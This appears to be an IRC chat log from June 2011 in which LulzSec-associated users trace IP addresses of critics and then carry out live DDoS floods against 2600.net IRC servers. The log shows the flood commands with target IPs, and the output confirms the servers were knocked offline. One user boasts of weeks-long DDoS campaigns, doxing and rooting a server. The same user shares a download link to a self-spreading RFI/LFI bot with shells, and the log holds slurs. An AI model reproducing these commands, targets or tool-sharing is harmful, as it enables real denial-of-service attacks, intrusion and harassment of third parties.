Jun 01 03:31:53 <lol> :o Jun 01 03:32:16 <joepie92> Naam: 76-216-232-237.lightspeed.sndgca.sbcglo bal.net Jun 01 03:32:16 <joepie92> Address: 76.216.232.237 Jun 01 03:33:00 <joepie92> Naam: 219-89-200-76.adsl.xtra.co.nz Jun 01 03:33:00 <joepie92> Address: 219.89.200.76 Jun 01 03:33:57 <joepie92> ok Jun 01 03:34:00 <joepie92> that's it Jun 01 03:34:05 <joepie92> can't see Nonynews' IP Jun 01 03:34:20 <joepie92> full list of IPs that have edited the wiki (that are visible) is Jun 01 03:34:20 <joepie92> 188.126.75.119 Jun 01 03:34:20 <joepie92> 76.106.247.143 Jun 01 03:34:20 <joepie92> 173.244.215.65 Jun 01 03:34:20 <joepie92> 76.216.232.237 Jun 01 03:34:20 <joepie92> 219.89.200.76 Jun 01 03:37:01 <joepie92> whoopsie Jun 01 03:37:03 <joepie92> seems I just found a hit Jun 01 03:37:20 <joepie92> anyone has any idea how I can see the actual nic k connected to an IP? Jun 01 03:37:26 <joepie92> /os session only shows the count Jun 01 03:37:59 <lol> how lol :D? Jun 01 03:39:19 <Topiary> 188.126.75.119 Jun 01 03:39:25 <Topiary> that's StrongVPN Jun 01 03:39:31 <Topiary> I've used that exact server before Jun 01 03:39:52 <lol> :O Jun 01 03:39:57 <lol> then it was YOUUUUUUUUUUUUU Jun 01 03:40:52 <joepie92> 1 ip matched, but it was kerkun _removing_ shit from the wiki Jun 01 03:40:58 <joepie92> so that's not an issue Jun 01 03:41:15 <Topiary> 219.89.200.76 = Auckland NZ? Jun 01 03:41:35 <joepie92> Topiary Jun 01 03:41:37 <joepie92> that was not strongvpn Jun 01 03:41:39 <joepie92> but anonine Jun 01 03:41:54 <Topiary> are you sure? I've been on the 188.126.* range b efore on StrongVPN Jun 01 03:42:02 <joepie92> C:\Users\ton>nslookup 188.126.75.119 Jun 01 03:42:02 <joepie92> Server: google-public-dns-a.google.com Jun 01 03:42:02 <joepie92> Address: 8.8.8.8 Jun 01 03:42:02 <joepie92> Naam: 75-119.anonymous.at.anonine.com Jun 01 03:42:02 <joepie92> Address: 188.126.75.119 Jun 01 03:42:07 <Topiary> interesting Jun 01 03:42:22 <joepie92> might be a shared range Jun 01 03:42:51 <joepie92> there's not so many anonine users.... on anonops ... Jun 01 03:42:54 <joepie92> lemme check for the range Jun 01 03:43:38 <Topiary> that's Stockholm, Sweden at any rate Jun 01 03:43:53 <Topiary> thought it was; I should really go back to Stron gVPN's Swedish jazz, real fast Jun 01 03:46:03 <joepie92> can't find any of the other ranges Jun 01 03:46:04 <joepie92> so Jun 01 03:46:05 <joepie92> idk Jun 01 03:46:13 <joepie92> I'll keep an eye out on these ranges Jun 01 03:47:03 <Topiary> well judging from reading all of their pages (wh ich I just did), I'd say it's awinee Jun 01 03:47:28 <Topiary> considering their main base of facts/screenshots comes from TinyChat.com/AnonOpsParty in the last 6 days Jun 01 03:47:40 <joepie92> unsure Jun 01 03:47:46 <joepie92> it's not just awinee Jun 01 03:47:50 <Topiary> other nicks: f00, dumb, test, awineecamslut

Jun 01 03:47:52 <joepie92> that wiki has mention of phenzen being raided Jun 01 03:47:57 <joepie92> afaik that was not shared in tinychat Jun 01 03:47:59 <Topiary> despite my absolute drunkenness, I remember thos e names trolling Jun 01 03:48:03 <joepie92> wait, since when is f00 == awinee? Jun 01 03:48:18 <Topiary> oh, f00 might not have been trollin' Jun 01 03:48:23 <joepie92> f00 is a troll Jun 01 03:48:25 <joepie92> he is with ryan Jun 01 03:48:28 <joepie92> and is known for fucking shit up Jun 01 03:48:32 <Topiary> ah, he was in TinyChat Jun 01 03:48:34 <joepie92> but afaik it's not awinee Jun 01 03:50:16 <Topiary> okay well, I'm staying away from TinyChat with t hose camwhores anyway Jun 01 03:50:23 <Topiary> Sabu and I got a bit carried away and gave LulzS ec away a bit Jun 01 03:51:08 <Topiary> I'm just assuming it's fakegregghoush + co., the y monitor all of Parmy's posts Jun 01 03:51:19 <Topiary> I used "Whirlpool" in a recent LulzSec interview (the only interview) Jun 01 03:51:24 <Topiary> with Parmy; their Wiki is updated with it Jun 01 03:53:20 <[redacted]> mfw joepie's on windows Jun 01 03:59:12 <[redacted]> http://www.youtube.com/watch?v=Au8LGtxwEO4 Jun 01 03:59:50 <lol> you know what Jun 01 03:59:57 <lol> now i think about it Jun 01 04:00:04 <lol> all these j35tr fags Jun 01 04:00:17 <lol> are all ppl who've been caught dossing or something Jun 01 04:00:29 <lol> you think they turned FBI bitch :D? Jun 01 04:00:40 <[redacted]> its a conspiracy Jun 01 04:01:50 <joepie92> yes, joepie is on windows Jun 01 04:01:51 <joepie92> because Jun 01 04:01:52 <joepie92> my fucking Jun 01 04:01:53 <joepie92> router Jun 01 04:01:54 <joepie92> is broken Jun 01 04:01:59 <joepie92> and refuses to assign an IP to my linux box Jun 01 04:02:02 <[redacted]> excuses Jun 01 04:02:03 <joepie92> no matter what I do Jun 01 04:02:03 <[redacted]> excuses Jun 01 04:02:13 <[redacted]> learn to ifconfig :D Jun 01 04:02:22 <storm> ^ Jun 01 04:02:28 <storm> Linux nimbus 2.6.38-8-generic #42-Ubuntu SMP Mon Apr 11 03:31:24 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux Jun 01 04:02:31 <joepie92> [redacted] Jun 01 04:02:35 <joepie92> the issue is my routers/modem Jun 01 04:02:43 <joepie92> I have a shitty sweex router that never worked p roperly Jun 01 04:02:47 <[redacted]> sure right Jun 01 04:02:48 <joepie92> a thomson speedtouch modem Jun 01 04:02:51 <joepie92> that is shit Jun 01 04:02:52 <[redacted]> but it somehow synchs with your XP box Jun 01 04:02:55 <[redacted]> automagically Jun 01 04:03:02 <[redacted]> over DHCP Jun 01 04:03:02 <joepie92> and a sitecom wifi router that has issues with a ssigning an IP Jun 01 04:03:04 <joepie92> eh Jun 01 04:03:07 <joepie92> because that always worked Jun 01 04:03:12 <joepie92> the wifi issue is only since recently Jun 01 04:03:14 <Topiary> joepie just likes Windows Jun 01 04:03:18 <joepie92> or rather, the IP assignment issue* Jun 01 04:03:42 <[redacted]> :D Jun 01 04:03:45 <storm> Windows is rubbish

Jun 01 04:03:48 <joepie92> it is Jun 01 04:03:51 <joepie92> so is speedtouch Jun 01 04:03:56 <joepie92> so is sitecom Jun 01 04:04:00 <joepie92> and so is especially sweex Jun 01 04:04:08 <storm> sup m_ Jun 01 04:04:10 <storm> :) Jun 01 04:04:11 <joepie92> I have some of the most retarded network equipme nt someone can possible have Jun 01 04:04:11 <joepie92> -_Jun 01 04:04:13 <joepie92> possibly* Jun 01 04:04:17 <[redacted]> not much bro :] Jun 01 04:06:23 <storm> nice Jun 01 04:07:03 <[redacted]> found a nice lfi on the box we're supposed to mi grate too Jun 01 04:07:04 <[redacted]> lol Jun 01 04:07:25 <[redacted]> been poking at it Jun 01 04:08:04 <storm> nice Jun 01 04:08:10 <storm> AIM for a sec? Jun 01 04:08:14 <[redacted]> sure Jun 01 04:27:31 <[redacted]> night guiz Jun 01 04:28:32 <storm> night Jun 01 04:28:37 <joepie92> night Jun 01 04:29:29 <lol> nini :) Jun 01 04:30:04 <joepie92> LOL Jun 01 04:30:05 <joepie92> http://www.youtube.com/watch?v=ZmUlKPthrag Jun 01 04:30:09 <joepie92> look at the top comments Jun 01 04:30:23 <storm> im hitting efnet spoofs Jun 01 04:30:23 <storm> ;x Jun 01 04:30:34 <storm> thats how bored i bez Jun 01 04:54:33 <Topiary> wanna find something to hit? Jun 01 05:05:45 <storm> sure Jun 01 05:06:01 <Topiary> there's shit cool site Jun 01 05:06:03 <Topiary> fbi.gov Jun 01 05:06:10 <lol> xD Jun 01 05:06:14 <storm> lol Jun 01 05:06:24 <lol> ddos ic3.gov :D Jun 01 05:06:40 <storm> whats with everyone wanting to hit govs Jun 01 05:06:55 <storm> are you really that open to just going to jail ;x Jun 01 05:07:08 <storm> not you you, te royal you Jun 01 05:07:10 <storm> the even Jun 01 05:08:21 <Topiary> I suppose we could piss off some IRC for lulz Jun 01 05:10:19 <storm> sure Jun 01 05:10:32 <joepie92> does any of you Jun 01 05:10:34 <joepie92> know a user called Jun 01 05:10:35 <joepie92> schmoo Jun 01 05:10:41 <lol> nope Jun 01 05:10:42 <lol> :/ Jun 01 05:10:44 <lol> why? Jun 01 05:10:46 <Topiary> negative Jun 01 05:10:49 <joepie92> I think it might be the nonynews guy Jun 01 05:10:52 <joepie92> posting shit on wikia Jun 01 05:10:59 <joepie92> but unsure Jun 01 05:11:02 <joepie92> I've never seen him talk Jun 01 05:11:05 <joepie92> he's in a lot of channels Jun 01 05:11:05 <Topiary> joepie92: nonynews posted on twitter that I was probably tweeting for LulzSec Jun 01 05:11:09 <Topiary> so yes Jun 01 05:11:10 <Topiary> might be Jun 01 05:11:13 <joepie92> only thign Jun 01 05:11:19 <joepie92> schmoo has op in propaganda

Jun 01 05:11:23 <joepie92> so I'm not sure how he got that Jun 01 05:11:33 <joepie92> so I'd have to ask the channel founder there Jun 01 05:11:34 <lol> nonynews is prbs a jesterfag thinking they're being cove rt Jun 01 05:11:36 <lol> xD Jun 01 05:11:40 <joepie92> nonynews also mentioned something Jun 01 05:11:42 <lol> best thing to do when bored Jun 01 05:11:43 <joepie92> that happened in #coders Jun 01 05:11:50 <joepie92> and there's only a few people there Jun 01 05:11:51 <lol> go to 2600 irc and just cause drama Jun 01 05:11:51 <lol> :D Jun 01 05:12:03 <Topiary> should we just go on over to 2600, flame them, a nd then packet it? Jun 01 05:12:07 <joepie92> @nonyNews Jun 01 05:12:07 <joepie92> nony News Jun 01 05:12:07 <joepie92> Peacemaking proposes an IP-spoofing version of # LOIC for use by #Anonymous. Ingenious! Jun 01 05:12:09 <joepie92> that was in #coders Jun 01 05:12:50 <joepie92> schmoo is/was in all channels that nonynews ment ions shit from it seems Jun 01 05:13:08 <joepie92> @nonyNews Jun 01 05:13:08 <Topiary> do we still have spies in #jester? Jun 01 05:13:08 <joepie92> nony News Jun 01 05:13:08 <joepie92> <lucid> I think anonymous should host a free pro xy server, that would be awesome -- Will die laughing when @FBIPressOffice sets this one up. Jun 01 05:13:18 <joepie92> (that was in #senloris, where schmoo is as well) Jun 01 05:13:19 <joepie92> and idk Jun 01 05:13:35 <Topiary> we need to gather info and profile all these fag s, backtrace crew/wiki crew/jester crew Jun 01 05:13:38 <Topiary> see where it all overlaps Jun 01 05:13:44 <joepie92> Topiary, pm Jun 01 05:13:47 <Topiary> k Jun 01 05:13:51 <storm> DONT DO IT Jun 01 05:13:54 <storm> ITS A TRAP Jun 01 05:13:59 <storm> ;p Jun 01 05:14:36 <Topiary> it's okay he just wants to see my cock Jun 01 05:14:49 <storm> surprise Jun 01 05:14:51 <lol> is the whois a complete fake too? Jun 01 05:14:56 <lol> even the one at private whois? Jun 01 05:14:56 <storm> didnt know you had a cock Jun 01 05:16:16 <storm> 05:16 -!- storm [~stormeh@97-120-249-224.ptld.qwest.net] Jun 01 05:16:17 <storm> 05:16 -!- ircname : stormeh Jun 01 05:16:17 <storm> 05:16 -!- channels : #telephreak #infoleak Jun 01 05:16:17 <storm> 05:16 -!- server : collective.2600.net [Arghhh, Scour ge of the seven seas!] Jun 01 05:16:17 <storm> 05:16 -!- hostname : 97.120.249.224 Jun 01 05:16:21 <storm> WTF NIGGER Jun 01 05:16:35 <storm> get the fk off my name Jun 01 05:16:37 <storm> :( Jun 01 05:17:27 <lol> if it's not reg'd dos him off of it xD Jun 01 05:17:54 <storm> im gonna hit 3 ips actually Jun 01 05:17:54 <storm> ;p Jun 01 05:18:00 <storm> 05:17 djslocker.2600.net has address 173.165.207.25 Jun 01 05:18:00 <storm> 05:17 -!- Irssi: process 0 (host djslocker.2600.net) ter minated with return Jun 01 05:18:00 <storm> code 0 Jun 01 05:18:00 <storm> 05:17 madjack.2600.net has address 216.86.158.122 Jun 01 05:18:00 <storm> 05:17 madjack.2600.net has IPv6 address 2607:f128:40:f00 :fe31::3

Jun 01 05:18:00 <storm> 05:17 -!- Irssi: process 0 (host madjack.2600.net) termi nated with return code 0 Jun 01 05:18:00 <storm> 05:17 collective.2600.net has address 208.111.35.75 Jun 01 05:18:05 <lol> :D Jun 01 05:18:16 <lol> or, lets go take over some chan on efet :D Jun 01 05:18:22 <lol> dos them all off :D Jun 01 05:18:25 <storm> lol Jun 01 05:18:29 <storm> either or Jun 01 05:18:30 <storm> ;D Jun 01 05:18:33 <lol> ;D Jun 01 05:18:39 * Topiary hops in iPredator VPN for the lulz and connects to 2600 Jun 01 05:18:46 <storm> i have too many channels on efnet Jun 01 05:18:52 <lol> let us do #phrack #cdej and #hackers Jun 01 05:18:59 <storm> anonymous (unknown@dmvdetailing.com) (Commercial) Jun 01 05:18:59 <storm> : ircname : unbound by space or time. Jun 01 05:18:59 <storm> channels : @#junkie @#malicious @#phear @#e @#syn @#ju piter @#addict @#juped Jun 01 05:18:59 <storm> @#geek @#overdose @#evil @#mayhem Jun 01 05:19:17 <storm> ;p Jun 01 05:19:52 <lol> or we can go to overthewire and give andrewg some shit : D Jun 01 05:21:03 <Topiary> sec, lemme get on something that isn't Japanese Jun 01 05:21:10 * Topiary has quit (Quit: true-story.pdf) Jun 01 05:21:20 <joepie92> lol Jun 01 05:22:02 <lol> Whats wrong with Japan :(? Jun 01 05:23:42 <storm> godzilla lives tere Jun 01 05:23:44 <storm> there Jun 01 05:24:50 <joepie92> I put a godzilla in your vpn so you can raep whi le you raep Jun 01 05:24:57 <storm> lol Jun 01 05:25:00 <joepie92> amidoinitright? Jun 01 05:25:04 <storm> no Jun 01 05:25:23 <joepie92> :( Jun 01 05:25:52 * t[2] (t@HA-vft.h6t.9puaba.IP) has joined #pure-elite Jun 01 05:26:03 <storm> that took forevar Jun 01 05:26:13 <storm> djslocker.2600.net down sons and daughters Jun 01 05:26:17 <joepie92> lol Jun 01 05:26:18 * t[2] is now known as Topiary Jun 01 05:26:20 <joepie92> wb Top Jun 01 05:26:29 * Topiary has quit (A TLS packet with unexpected length wa s received.) Jun 01 05:26:37 <storm> lol Jun 01 05:26:38 <storm> oops Jun 01 05:26:38 * Topiary (t@HA-vft.h6t.9puaba.IP) has joined #pure-elite Jun 01 05:26:45 <joepie92> lol Jun 01 05:27:02 <Topiary> right Jun 01 05:27:07 <storm> Topiary Jun 01 05:27:13 <storm> get on 3600 Jun 01 05:27:14 <storm> er Jun 01 05:27:15 <storm> 2600 Jun 01 05:27:16 <Topiary> disregard two disconnects; forgot password, coul dn't be bothered to type it right Jun 01 05:27:16 <storm> lD Jun 01 05:27:18 <storm> ;D Jun 01 05:27:20 <Topiary> okay dude Jun 01 05:27:24 <Topiary> I'm in Switzerland right nao :D Jun 01 05:27:30 <storm> hot Jun 01 05:27:31 <joepie92> lolol Jun 01 05:27:44 <joepie92> pm again btw :P

Jun 01 05:29:18 <storm> 05:29 -!- djslocker.2600.net ---------------------- Users: 26 Jun 01 05:29:20 <storm> roflol Jun 01 05:29:26 <Topiary> okay I'm on Jun 01 05:29:28 <Topiary> where we at? Jun 01 05:29:31 <storm> ./map Jun 01 05:29:34 <storm> look at djs Jun 01 05:29:53 <Topiary> heh 30 people Jun 01 05:30:02 <Topiary> sec reading shit Jun 01 05:33:01 <storm> madjack.2600.net nao Jun 01 05:33:02 <storm> ;D Jun 01 05:33:32 <storm> 64 packets transmitted, 8 received, 87% packet loss, tim e 62994ms Jun 01 05:33:49 <lol> :D Jun 01 05:33:54 <storm> its nulled Jun 01 05:34:36 <lol> hahah Jun 01 05:34:47 <storm> 67 packets transmitted, 0 received, 100% packet loss, ti me 65992ms Jun 01 05:34:50 <storm> lol Jun 01 05:34:52 <storm> :] Jun 01 05:35:16 <lol> can you hit this ip 69.164.198.161 :D it's some fag on 2 600 in #lulzsec we're going to take over the channel :D Jun 01 05:35:26 <lol> he is only person in there :D Jun 01 05:36:23 <storm> what server is he on Jun 01 05:36:27 <storm> he'll just ping out anyway Jun 01 05:37:41 <lol> madjack.2600.net Jun 01 05:37:53 * Topiary is on collective Jun 01 05:38:04 <Topiary> * [ego] (~ego@46.19.143.19): ego Jun 01 05:38:06 <Topiary> don't DDoS me pl0x Jun 01 05:38:11 <storm> madjacks dead Jun 01 05:38:15 <storm> so just wait for him to die Jun 01 05:39:32 <storm> er wait na madjacks back xD Jun 01 05:39:41 <Topiary> I just got disconnected from collective Jun 01 05:39:42 <storm> its null lasts like 5 - 6 minutes Jun 01 05:39:45 <storm> orly Jun 01 05:40:47 <Topiary> reconnected to djs Jun 01 05:40:54 <storm> yeah same Jun 01 05:40:54 <Topiary> expecting a ping on collective Jun 01 05:41:16 <storm> can you get a map? Jun 01 05:42:02 <storm> looks like we pissed these guys off so bad that they upp ed some of their boxes filtering Jun 01 05:42:11 <storm> lululul Jun 01 05:42:26 <lol> :D Jun 01 05:42:36 <storm> OH Jun 01 05:42:38 <storm> mads gone Jun 01 05:42:43 <storm> did that guy ping? Jun 01 05:43:04 <Topiary> yeah Jun 01 05:43:08 <storm> gg Jun 01 05:43:18 <lol> i can't even connect to 2600 xD Jun 01 05:43:22 <storm> lmfao Jun 01 05:43:30 <storm> 05:43 -!- egotistical [~ego@46.19.143.19] has joined #lu lzsec Jun 01 05:43:30 <storm> 05:43 < egotistical> bitches Jun 01 05:43:32 <storm> ROFL Jun 01 05:43:36 <storm> that you? Jun 01 05:43:42 <storm> or the guy who was in there befiore Jun 01 05:43:44 <storm> before even Jun 01 05:43:49 <Topiary> it's me Jun 01 05:43:51 <lol> thts Topiary Jun 01 05:43:55 <storm> oh i c

Jun 01 05:43:56 <Topiary> for some reason my collective shit hasn't pinged Jun 01 05:43:57 <storm> xD Jun 01 05:44:05 <storm> it will if i let off of it Jun 01 05:44:14 <storm> i think Jun 01 05:44:14 <lol> Topiary what server are you connected to? Jun 01 05:44:14 <storm> that or their ping timeouts super high Jun 01 05:44:14 <Topiary> djs Jun 01 05:44:19 <storm> djslock Jun 01 05:44:20 <Topiary> should be 240 secs Jun 01 05:44:21 <lol> .net? Jun 01 05:44:24 <storm> ya Jun 01 05:44:37 <Topiary> * djslocker.2600.net ------------------------------ Users: 111 (63.4%) Jun 01 05:44:37 <Topiary> * `- blackbeard.2600.net ------------------------- Users: 0 (0.0%) Jun 01 05:44:37 <Topiary> * - collective.2600.net --------------------- Users: 55 (31.4%) Jun 01 05:44:37 <Topiary> * `- services.2600.net ----------------------- Users: 9 (5.1% Jun 01 05:44:44 <Topiary> these guys are so fun to fuck Jun 01 05:45:01 <storm> dont worry djs is next Jun 01 05:45:02 <storm> >:LD Jun 01 05:45:04 <storm> >:D Jun 01 05:45:27 <lol> wait :D let us troll the shit out of them first :D Jun 01 05:45:50 <lol> then we can PUSH/SYN/ACK/UDP them to oblivion hahahahaha haha Jun 01 05:45:57 <storm> ewwwwwwwww Jun 01 05:46:00 <storm> YOU SAID UDP Jun 01 05:46:02 <storm> !!!! Jun 01 05:46:04 <lol> :o Jun 01 05:46:06 <storm> i am using urg Jun 01 05:46:09 <storm> atm Jun 01 05:46:17 <lol> UDP is ok, if you hit ports at rand Jun 01 05:46:22 <storm> well Jun 01 05:46:30 <storm> i had access to these great britian boxes Jun 01 05:46:32 <storm> those + udp Jun 01 05:46:34 <storm> were sexy Jun 01 05:47:03 <lol> i used to load about 8,000 RFI with usp flooder crushed most server :D Jun 01 05:47:09 <lol> udp* Jun 01 05:47:16 <lol> it used to hit ports at random Jun 01 05:47:17 <lol> :D Jun 01 05:47:35 <Topiary> I imagine it would Jun 01 05:48:09 <lol> i ddos'd enturbulation.org, whyweprotest, anonnet for ab out 3 week with it all :DDDDD Jun 01 05:48:18 <storm> haha Jun 01 05:48:22 <Topiary> ahaha that was you? Jun 01 05:48:24 <storm> i only use TCP Jun 01 05:48:26 <lol> yes :D Jun 01 05:48:31 <Topiary> Gregg Housh was bitching about that Jun 01 05:48:42 <lol> alot of people we're bitching about it Jun 01 05:48:48 <lol> let me show you Jun 01 05:49:01 <lol> i dont care if this USB infects me because it's funny to show you this :D Jun 01 05:49:39 <storm> Flood completed, 41784641 packets sent, 75 seconds, 5571 28 packets/sec Jun 01 05:49:42 <storm> nulled madjack Jun 01 05:49:45 <storm> again Jun 01 05:50:47 <lol> it's actually not infected :D Jun 01 05:51:13 <storm> yay

Jun 01 05:51:15 * joepie92 remembers an UDP flood on this home IP Jun 01 05:51:23 <storm> [05:51] [storm__(+i)] [2:djslocker/#lulzsec(+nt)] [Lag: 51 (??)] Jun 01 05:51:23 <Topiary> pretty sure I just pinged from djs Jun 01 05:51:25 <lol> storm would you also like the RFI/LFI bot with google by pass i was talking about while i have this plugged in? Jun 01 05:51:29 <storm> rofl Jun 01 05:51:31 <storm> Topiary Jun 01 05:51:32 <storm> <3 Jun 01 05:51:39 <storm> yes Jun 01 05:51:43 <storm> i would kayla Jun 01 05:51:44 <storm> :) Jun 01 05:51:44 <joepie92> a while ago I had ~20 shared hosting servers UDP flooding my modem... Jun 01 05:51:53 <joepie92> not sure how it didn't melt Jun 01 05:52:07 <storm> Sending packets of size 40....x 208.111.35.75 218.108.23 5.225 6667 0 20 0 Jun 01 05:52:13 <storm> [root@node1(~/opt/.local)]#./nsdapx 173.165.207.25 0 666 7 0 20 0 Jun 01 05:52:16 <storm> both at same time Jun 01 05:52:17 <storm> lol Jun 01 05:52:20 <lol> i dont know if the bypass will still work it is a old bo t :D Jun 01 05:52:21 <Topiary> welp, they're fucked Jun 01 05:52:25 <lol> but we will see :D Jun 01 05:52:26 <storm> and madjacks nulled Jun 01 05:52:26 <storm> dude Jun 01 05:52:34 <storm> theyre not gonna have anywhere to chatr Jun 01 05:52:36 <storm> chat* Jun 01 05:52:37 <Topiary> by the way, they think we're firing botnets that can only keep it down for 10 mins at a time Jun 01 05:52:46 <storm> lol Jun 01 05:52:50 <storm> theyre retarded Jun 01 05:52:51 <storm> xD Jun 01 05:53:08 <Topiary> okay so everything is down? madjack nulled, coll ective out, djs out, what about blackbeard? Jun 01 05:53:14 <storm> 05:52 -!- bottle_of_rum [~bottle_of@189-39-145-108.gru.f lash.tv.br] has quit Jun 01 05:53:14 <storm> [Ping timeout: 240 seconds] Jun 01 05:53:16 <storm> LOL Jun 01 05:53:29 <storm> [Lag: 176 (??)] Jun 01 05:53:38 <Topiary> mine's about to go if it hasn't already Jun 01 05:53:51 <storm> 05:53 -!- ego [~ego@46.19.143.19] has quit [Ping timeout : 240 seconds] Jun 01 05:53:52 <storm> did Jun 01 05:54:04 <storm> [Lag: 211 (??)] Jun 01 05:54:06 <Topiary> * Connecting to irc.2600.net (94.125.252.114) po rt 6667... Jun 01 05:54:06 <Topiary> * Connecting to irc.2600.net (173.165.207.25) po rt 6667... Jun 01 05:54:08 <Topiary> failed Jun 01 05:54:11 <storm> :D Jun 01 05:54:21 <Topiary> oh shit I'm in on 173 Jun 01 05:54:22 <storm> 05:54 -!- ERROR Closing Link: c-68-56-76-36.hsd1.fl.comc ast.net (Ping timeout: Jun 01 05:54:22 <storm> 240 seconds) Jun 01 05:54:22 <storm> 05:54 -!- Irssi: Connection lost to djslocker.2600.net Jun 01 05:54:22 <storm> 05:54 -!- Irssi: Removed reconnection to server djslocke r.2600.net port 6667 Jun 01 05:54:22 <storm> 05:54 -!- Irssi: Looking up djslocker.2600.net

Jun 01 05:54:22 <storm> 05:54 -!- Irssi: Reconnecting to djslocker.2600.net [173 .165.207.25] port 6667 Jun 01 05:54:22 <storm> - use /RMRECONNS to abort Jun 01 05:54:24 <Topiary> slooooowly Jun 01 05:54:41 <storm> i let off Jun 01 05:54:44 <storm> wanna check users Jun 01 05:54:45 <storm> ;x Jun 01 05:54:47 <Topiary> * collective.2600.net ----------------------------- Users: 114 (30.2%) Jun 01 05:54:47 <Topiary> * `- blackbeard.2600.net ------------------------- Users: 0 (0.0%) Jun 01 05:54:48 <Topiary> * - madjack.2600.net ------------------------ Users: 132 (35.0%) Jun 01 05:54:48 <Topiary> * - djslocker.2600.net ---------------------- Users: 122 (32.4%) Jun 01 05:54:48 <Topiary> * `- services.2600.net ----------------------- Users: 9 (2.4% Jun 01 05:55:06 <storm> 05:54 -!- djslocker.2600.net ------------------------------ Users: 95 Jun 01 05:55:06 <storm> (29.3%) Jun 01 05:55:06 <storm> 05:54 -!- `- blackbeard.2600.net ------------------------- Users: 0 Jun 01 05:55:06 <storm> (0.0%) Jun 01 05:55:06 <storm> 05:54 -!- madjack.2600.net ------------------------ Users: 132 Jun 01 05:55:06 <storm> (40.7%) Jun 01 05:55:06 <storm> 05:54 -!- collective.2600.net --------------------- Users: 88 Jun 01 05:55:06 <storm> (27.2%) Jun 01 05:55:06 <storm> 05:54 -!`- services.2600.net ----------------------- Users: 9 Jun 01 05:55:09 <storm> you're off Jun 01 05:55:11 <storm> i think Jun 01 05:55:47 <Topiary> still going strong Jun 01 05:55:49 <storm> madjacks done Jun 01 05:56:36 <Topiary> * bottle_of_rum has quit (Ping timeout: 240 seco nds) Jun 01 05:56:36 <Topiary> * ego has quit (Ping timeout: 240 seconds) Jun 01 05:56:37 <Topiary> * storm__ has quit (Ping timeout: 240 seconds Jun 01 05:56:37 <Topiary> LOL Jun 01 05:56:43 <storm> lolol Jun 01 05:57:48 <lol> Topiary: So yeh, the thing with anonnet, entub, whywe pr otest all started because my friend C ddos'd anonnet and i got the blame for it, genome was ranting at me for ages saying my ddos was pathetic when it wasn't ev en me who ddos'd him Jun 01 05:57:59 <lol> so i thought "fuck it, ill show you ddos" Jun 01 05:58:11 <lol> kept enturb, wwp, anonnet down for 3 weeks Jun 01 05:58:14 <Topiary> good idea Jun 01 05:58:23 <lol> then genome was demanding my dox Jun 01 05:58:26 <lol> so i dox'd him Jun 01 05:58:29 <lol> see this Jun 01 05:58:52 <lol> http://www.aminsb.org/administrator/sec/lols/genome.txt Jun 01 05:59:05 <lol> he raged like fuck for ages Jun 01 05:59:11 <lol> threatening all kinds Jun 01 05:59:14 <lol> so i did this Jun 01 05:59:30 <lol> http://www.aminsb.org/administrator/sec/lols/anonnet.txt Jun 01 05:59:35 <lol> rooted tht shit :D Jun 01 05:59:48 <lol> after tht he p much gave up :D Jun 01 06:00:04 <Topiary> * collective.2600.net ----------------------------- Users: 152 (55.1%)

Jun 01 06:00:06 <Topiary> * `- blackbeard.2600.net ------------------------- Users: 0 (0.0%) Jun 01 06:00:08 <Topiary> * - djslocker.2600.net ---------------------- Users: 115 (41.7%) Jun 01 06:00:10 <Topiary> * `- services.2600.net ----------------------- Users: 9 (3.3%) Jun 01 06:00:11 <storm> lol Jun 01 06:00:12 <Topiary> ruh roh, madjack's gone Jun 01 06:00:14 <storm> XD Jun 01 06:01:53 <Topiary> let's just let 'em up and troll under different types of weather Jun 01 06:01:56 <Topiary> you be storm, I be whirlpool Jun 01 06:01:59 <Topiary> kayla be tornado Jun 01 06:02:18 <storm> xD Jun 01 06:02:25 <joepie92> ... a whirlpool isn't weather? Jun 01 06:02:31 <storm> LMFAO Jun 01 06:02:46 <Topiary> YES IT IS JOEPIE Jun 01 06:02:54 <joepie92> lolno Jun 01 06:02:54 <Topiary> GOSH JOEPIE Jun 01 06:03:10 <joepie92> lolno it r not Jun 01 06:03:30 <Topiary> okay, let's troll under names of natural disaste rs Jun 01 06:03:32 <Topiary> you be storm Jun 01 06:03:35 <Topiary> I be whirlpool Jun 01 06:03:38 <Topiary> joepie be joepie Jun 01 06:03:38 <storm> lmao Jun 01 06:03:40 <Topiary> >:[ Jun 01 06:03:42 <joepie92> LOL Jun 01 06:03:50 <joepie92> also a whirlpool is not a natural disaster Jun 01 06:03:56 <Topiary> listen bro Jun 01 06:04:01 <Topiary> I've seen PotC 3 Jun 01 06:04:06 <joepie92> "natural occurences" would probably be more accu rate Jun 01 06:04:06 <joepie92> :) Jun 01 06:04:07 <Topiary> and that thing fucks shit up Jun 01 06:04:12 <joepie92> occurrences*? Jun 01 06:04:15 <joepie92> herpderpenglish Jun 01 06:04:19 <lol> storm: http://www.aminsb.org/administrator/sec/lols/d0ng s.rar Jun 01 06:04:22 <lol> tht bot :D Jun 01 06:04:29 <joepie92> A whirlpool is a swirling body of water usually produced by ocean tides. The vast majority of whirlpools are not very powerful. More powerful ones are more properly termed maelstroms. Vortex is the proper ter m for any whirlpool that has a downdraft. Very small whirlpools can easily be se en when a bath or a sink is draining, but these are produced in a very different manner from those in nature. Smaller whirlpools Jun 01 06:04:30 <joepie92> also appear at the base of many waterfalls.[1] In the case of powerful waterfalls, like Niagara Falls, these whirlpools can be quite strong. The most powerful whirlpools are created in narrow shallow straits with fast flowing water. Jun 01 06:04:32 <storm> tyty Jun 01 06:04:54 <lol> you need to set all the files up on a server Jun 01 06:05:04 <storm> lol im already wgetting it somewhere Jun 01 06:05:09 <Topiary> >whirlpool is now known as maelstrom Jun 01 06:05:20 <joepie92> lol Jun 01 06:05:26 <Topiary> >enemy ship is now known as driftwood Jun 01 06:05:30 <lol> liek the shell, phpbot if you want it to spread and the perl bot to spread and the id's aswell as the google.php thts the google bypas b ut i dont know if the google bypass still works Jun 01 06:05:31 <joepie92> ahahaha

